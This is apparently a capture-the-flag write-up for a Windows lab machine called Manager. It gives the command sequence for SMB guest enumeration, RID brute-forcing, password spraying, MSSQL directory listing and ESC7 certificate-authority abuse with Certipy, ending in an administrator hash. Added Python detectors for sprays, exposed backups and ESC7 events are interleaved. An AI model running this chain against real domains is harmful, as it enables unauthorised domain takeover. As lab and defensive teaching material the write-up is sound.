Manager (Windows, Medium)

OVERVIEW

As always, we start with the target's IP address, so let's scan it with Nmap.
ENUMERATION

The scan shows a lot of open ports, so let's enumerate them one by one. Before that, don't forget to add the domain and the DC hostname to your /etc/hosts file.
Let's start with the HTTP website on port 80.

I enumerated the web page and tried to find directories and subdomains, but didn't get anything, so let's move on to the SMB service and check whether guest login is allowed:
nxc smb 10.129.53.136 -u guest -p ''
nxc smb 10.129.53.136 -u guest -p '' --shares

Guest login works and we can list the shares, but none of them contain anything useful to us. Next, let's try RID cycling with --rid-brute to enumerate users and groups:
nxc smb 10.129.53.136 -u guest -p '' --rid-brute

There we go, we got the users. Let's save them in a file named users.txt:
administrator
guest
krbtgt
dc01$
zhong
cheng
ryan
raven
jinWoo
chinHae
operator
There is a chance that a user is using their username as their password, so let's check this with a spray over SMB (--no-bruteforce pairs each username only with the password in the same position of the password list, here its own username):
nxc smb 10.129.53.136 -u users.txt -p users.txt --continue-on-success --no-bruteforce

We got a hit for the user operator.
I checked its share permissions and other services, even BloodHound data, but didn't find anything useful, so let's try this user against the MSSQL service.
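The spray above is loud from the defender's side: one source address fails logons for many different accounts within seconds and then succeeds for one of them. The following is an added example (not part of the original write-up) of a detection rule for exactly that pattern, run over constructed Windows logon events (Event ID 4625 for failures, 4624 for successes, logon type 3 for network logons such as SMB). The event list and its simplified field names are constructed for this example; they are not a real Security log export.

```python
"""Password-spray detection over constructed Windows logon events.

A sliding window per source address counts how many *distinct* accounts
failed to log on; once that count reaches the threshold the source is
reported, together with any account that later succeeded from it.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real data): one host tries username==password
# for each account from a user list and hits on one of them, while an
# unrelated workstation has a user mistyping their own password twice.
SAMPLE_EVENTS = [
    {"time": "2023-07-27T10:00:01", "id": 4625, "user": "administrator", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:02", "id": 4625, "user": "guest", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:03", "id": 4625, "user": "krbtgt", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:04", "id": 4625, "user": "zhong", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:05", "id": 4625, "user": "cheng", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:06", "id": 4625, "user": "ryan", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:07", "id": 4625, "user": "raven", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:08", "id": 4625, "user": "jinwoo", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:09", "id": 4625, "user": "chinhae", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:00:10", "id": 4624, "user": "operator", "src": "10.10.14.5", "logon_type": 3},
    {"time": "2023-07-27T10:01:00", "id": 4625, "user": "ryan", "src": "10.10.20.7", "logon_type": 3},
    {"time": "2023-07-27T10:01:30", "id": 4625, "user": "ryan", "src": "10.10.20.7", "logon_type": 3},
]


def parse_events(raw):
    """Convert ISO timestamps to datetime objects and sort by time."""
    parsed = []
    for e in raw:
        e = dict(e)
        e["time"] = datetime.fromisoformat(e["time"])
        parsed.append(e)
    return sorted(parsed, key=lambda e: e["time"])


def detect_spray(raw_events, window=timedelta(minutes=5), min_users=5):
    """Return one alert per source that failed logons for >= min_users
    distinct accounts inside `window`, with any later successes listed."""
    events = parse_events(raw_events)
    failures = defaultdict(list)   # src -> failed network logons
    successes = defaultdict(list)  # src -> successful network logons
    for e in events:
        if e.get("logon_type") != 3:
            continue
        if e["id"] == 4625:
            failures[e["src"]].append(e)
        elif e["id"] == 4624:
            successes[e["src"]].append(e)

    alerts = []
    for src, fails in failures.items():
        counts = defaultdict(int)  # distinct users in the current window
        left = 0
        best = None
        for right, e in enumerate(fails):
            counts[e["user"].lower()] += 1
            # Slide the left edge forward until the window fits.
            while e["time"] - fails[left]["time"] > window:
                u = fails[left]["user"].lower()
                counts[u] -= 1
                if counts[u] == 0:
                    del counts[u]
                left += 1
            if len(counts) >= min_users and (best is None or len(counts) > best["distinct_users"]):
                best = {"src": src, "distinct_users": len(counts),
                        "start": fails[left]["time"], "end": e["time"]}
        if best:
            # A success from the spraying host shortly after the window is
            # the account whose password was guessed.
            best["successes"] = sorted({
                s["user"].lower() for s in successes[src]
                if best["start"] <= s["time"] <= best["end"] + window
            })
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f"spray from {a['src']}: {a['distinct_users']} accounts, "
              f"{a['start']:%H:%M:%S}-{a['end']:%H:%M:%S}, successes={a['successes']}")
```

The benign workstation never triggers the rule because the count is of distinct accounts, not of attempts; repeated failures for one user are a lockout or typo problem, not a spray. Mitigation on the page's own finding is a password policy that rejects trivially guessable passwords such as the username itself.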
EXPLOITATION
mssqlclient.py manager.htb/operator:operator@manager.htb -dc-ip 10.129.53.136 -windows-auth

And it worked. Now let's enumerate it.
While enumerating, I found the xp_dirtree stored procedure, which lists the contents of a file-system directory. Let's try it:
EXEC xp_dirtree 'C:\', 1, 1;

As you can see, we can list the directories. Now let's look at the website directory, since something might be there that we couldn't reach from the outside enumeration:
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

We can see a backup zip, which might contain some information. Since it sits in the web root, we can fetch it directly from the website:
wget http://manager.htb/website-backup-27-07-23-old.zip

After unzipping the file, we find a .old-conf.xml file which might contain something useful, so let's look at it.

And here we go: we got the password of the user Raven, which we can use to get an Evil-WinRM shell.
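The root cause of the foothold above is a backup archive, containing a configuration file with a plaintext password, left inside the web root. As an added example (not code from the original write-up), here is a small audit script a web administrator could run against the web root to catch exactly this: it flags archive and backup files that are web-reachable, opens zip archives, and scans configuration files for credential-looking entries. The sample web root, its backup zip, the .old-conf.xml inside it and the password value are all constructed for this example; the extension lists and the regular expression are assumptions you would tune for your own stack.

```python
"""Audit a web root for exposed backups and plaintext credentials."""
import os
import re
import tempfile
import zipfile

# Files that should never be web-reachable at all.
BACKUP_EXT = {".zip", ".7z", ".rar", ".tar", ".gz", ".tgz", ".bak", ".old", ".orig"}
# Files worth reading for credential-looking entries.
CONFIG_EXT = {".xml", ".config", ".ini", ".env", ".conf", ".json", ".yml", ".yaml", ".txt"}
# Key followed by '=', ':', '>' or a quote, e.g. password=, <password>, "pwd":
SECRET_RE = re.compile(r"(?i)\b(password|passwd|pwd|secret|apikey|api_key)\b\s*[=:>\"']")


def scan_text(text, origin):
    """Return a finding for every line of `text` that looks like a credential."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if SECRET_RE.search(line):
            hits.append({"kind": "secret-in-config", "origin": origin,
                         "line": n, "text": line.strip()[:80]})
    return hits


def scan_webroot(root):
    """Walk `root` and report exposed backups and credential-looking lines."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if ext == ".zip":
                findings.append({"kind": "backup-file-exposed", "origin": rel})
                # Look inside the archive: backups usually carry old configs.
                with zipfile.ZipFile(path) as zf:
                    for member in zf.namelist():
                        base = os.path.basename(member)
                        mext = os.path.splitext(base)[1].lower()
                        if mext in CONFIG_EXT or base.startswith("."):
                            data = zf.read(member).decode("utf-8", "replace")
                            findings.extend(scan_text(data, f"{rel}:{member}"))
            elif ext in BACKUP_EXT:
                findings.append({"kind": "backup-file-exposed", "origin": rel})
            elif ext in CONFIG_EXT or name.startswith("."):
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings.extend(scan_text(f.read(), rel))
    return findings


def build_sample_webroot():
    """Create a constructed web root in a temp dir that mirrors the finding
    on this box: a dated backup zip holding a dot-config file with a password."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html><body>ok</body></html>\n")
    with open(os.path.join(root, "web.config"), "w") as f:
        f.write('<?xml version="1.0"?>\n<configuration>\n  <system.web />\n</configuration>\n')
    zpath = os.path.join(root, "website-backup-27-07-23-old.zip")
    with zipfile.ZipFile(zpath, "w") as zf:
        zf.writestr(".old-conf.xml",
                    '<?xml version="1.0"?>\n<config>\n  <user>raven</user>\n'
                    '  <password>EXAMPLE-NOT-A-REAL-PASSWORD</password>\n</config>\n')
        zf.writestr("index.html", "<html>old</html>\n")
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(finding)
```

Run it with a real path in place of the constructed one and treat every backup-file-exposed hit as a removal task and every secret-in-config hit as a credential rotation, since anyone who could list or guess the file name has already had that password.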
USER FLAG

We are in as Raven and can now grab the user flag.
PRIVILEGE ESCALATION
To escalate privileges, I decided to check for ADCS vulnerabilities, so let's run Certipy to see whether there are any (make sure Certipy is up to date):
certipy find -u raven -p 'REDACTED' -dc-ip 10.129.53.136 -vulnerable -stdout

And here we go: we found an ESC7 vulnerability. Raven has ManageCA rights as well as enrollment rights, but not Manage Certificates rights, so let's use the ManageCA rights to grant Raven that right by adding Raven as a certificate officer:
certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -add-officer Raven
Now we can enable the SubCA template (do this even if it is already enabled):
certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -enable-template SubCA
Since the SubCA template is now enabled, let's get the request ID of the certificate we need to issue by requesting a certificate for the UPN administrator@manager.htb. Don't forget to save the private key by pressing y:
certipy req -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -template SubCA -upn administrator@manager.htb

We got our request ID, which is 20, so let's issue the certificate for this ID (replace 20 below with your own request ID):
certipy ca -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -issue-request 20

As you can see, the certificate was successfully issued for the request ID. The only thing left is to retrieve it and get administrator.pfx:
certipy req -u Raven -p 'REDACTED' -dc-ip 10.129.53.136 -ca "manager-DC01-CA" -retrieve 20

We got administrator.pfx. Now we can use it to get the Administrator hash:
certipy auth -pfx administrator.pfx -dc-ip 10.129.53.136 -domain manager.htb
If it shows an error saying the clock skew is too great, run:
sudo ntpdate 10.129.53.136
Then run the above command again.

We get the Administrator hash, which we can use to get an Evil-WinRM session.
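Every step of the ESC7 chain above leaves a trace on the CA when Certificate Services auditing is enabled: changing officer rights logs Event ID 4890, changing the CA's template list logs 4891, the request logs 4886, the pending status 4889 and the manual issuance 4887. The distinctive signal is that the same low-privileged account changes officer settings, submits a request for someone else's UPN and then approves its own request. The following is an added detection example (not part of the original write-up) that correlates those events. The event records and their flat field names (subject, request_id, upn, template) are constructed for this example and simplify the real audit log; the 4887/4886 pairing by request_id and the one-hour window are assumptions to tune for your environment.

```python
"""Correlate constructed CA audit events into an ESC7-style alert."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs). Request 20 mirrors the chain on this
# box; request 21 is a normal user certificate issued by the CA itself.
SAMPLE_CA_EVENTS = [
    {"time": "2023-07-27T12:00:00", "id": 4890, "subject": "MANAGER\\raven",
     "details": "officer rights changed: MANAGER\\raven added"},
    {"time": "2023-07-27T12:00:30", "id": 4891, "subject": "MANAGER\\raven",
     "details": "Templates: SubCA enabled"},
    {"time": "2023-07-27T12:01:00", "id": 4886, "subject": "MANAGER\\raven",
     "request_id": 20, "template": "SubCA", "upn": "administrator@manager.htb"},
    {"time": "2023-07-27T12:01:00", "id": 4889, "subject": "MANAGER\\raven", "request_id": 20},
    {"time": "2023-07-27T12:02:00", "id": 4887, "subject": "MANAGER\\raven", "request_id": 20},
    {"time": "2023-07-27T12:05:00", "id": 4886, "subject": "MANAGER\\zhong",
     "request_id": 21, "template": "User", "upn": "zhong@manager.htb"},
    {"time": "2023-07-27T12:05:01", "id": 4887, "subject": "NT AUTHORITY\\SYSTEM", "request_id": 21},
]

SERVICE_IDENTITIES = {"nt authority\\system"}


def _parse(raw):
    out = []
    for e in raw:
        e = dict(e)
        e["time"] = datetime.fromisoformat(e["time"])
        e["subject"] = e["subject"].lower()
        out.append(e)
    return sorted(out, key=lambda e: e["time"])


def _within(times, now, window):
    """True if any timestamp in `times` lies in the `window` before `now`."""
    return any(0 <= (now - t).total_seconds() <= window.total_seconds() for t in times)


def detect_esc7(raw_events, window=timedelta(hours=1)):
    """Return alerts for issuances (4887) that combine two or more ESC7
    indicators: self-approval, a UPN that is not the requester's own, an
    officer-rights change (4890) or a template-list change (4891) by the
    same account shortly before."""
    events = _parse(raw_events)
    officer_changes = defaultdict(list)   # subject -> times of 4890
    template_changes = defaultdict(list)  # subject -> times of 4891
    requests = {}                         # request_id -> 4886 event
    alerts = []
    for e in events:
        if e["id"] == 4890:
            officer_changes[e["subject"]].append(e["time"])
        elif e["id"] == 4891:
            template_changes[e["subject"]].append(e["time"])
        elif e["id"] == 4886:
            requests[e["request_id"]] = e
        elif e["id"] == 4887:
            req = requests.get(e["request_id"])
            if req is None:
                continue
            issuer, requester = e["subject"], req["subject"]
            reasons = []
            if issuer == requester and issuer not in SERVICE_IDENTITIES and not issuer.endswith("$"):
                reasons.append("request approved by its own requester")
            upn = req.get("upn")
            sam = requester.split("\\")[-1]
            if upn and upn.split("@")[0].lower() != sam:
                reasons.append(f"requested UPN {upn} does not belong to requester {requester}")
            if _within(officer_changes[issuer], e["time"], window):
                reasons.append("issuer changed certificate manager (officer) settings shortly before")
            if _within(template_changes[issuer], e["time"], window):
                reasons.append("issuer changed the CA template list shortly before")
            if len(reasons) >= 2:
                alerts.append({"request_id": e["request_id"], "subject": issuer,
                               "template": req.get("template"), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_esc7(SAMPLE_CA_EVENTS):
        print(f"request {a['request_id']} ({a['template']}) by {a['subject']}:")
        for r in a["reasons"]:
            print("  -", r)
```

The fix for the underlying misconfiguration is to remove ManageCA from accounts that do not administer the CA and to keep the SubCA template disabled unless a subordinate CA is actually being deployed; the detection above is the safety net for when those rights drift back.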
ROOT FLAG

Now you can grab the root flag and complete the machine.
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For any query or problem, either leave a comment or contact me at reapsec.com
THANKS FOR READING !!!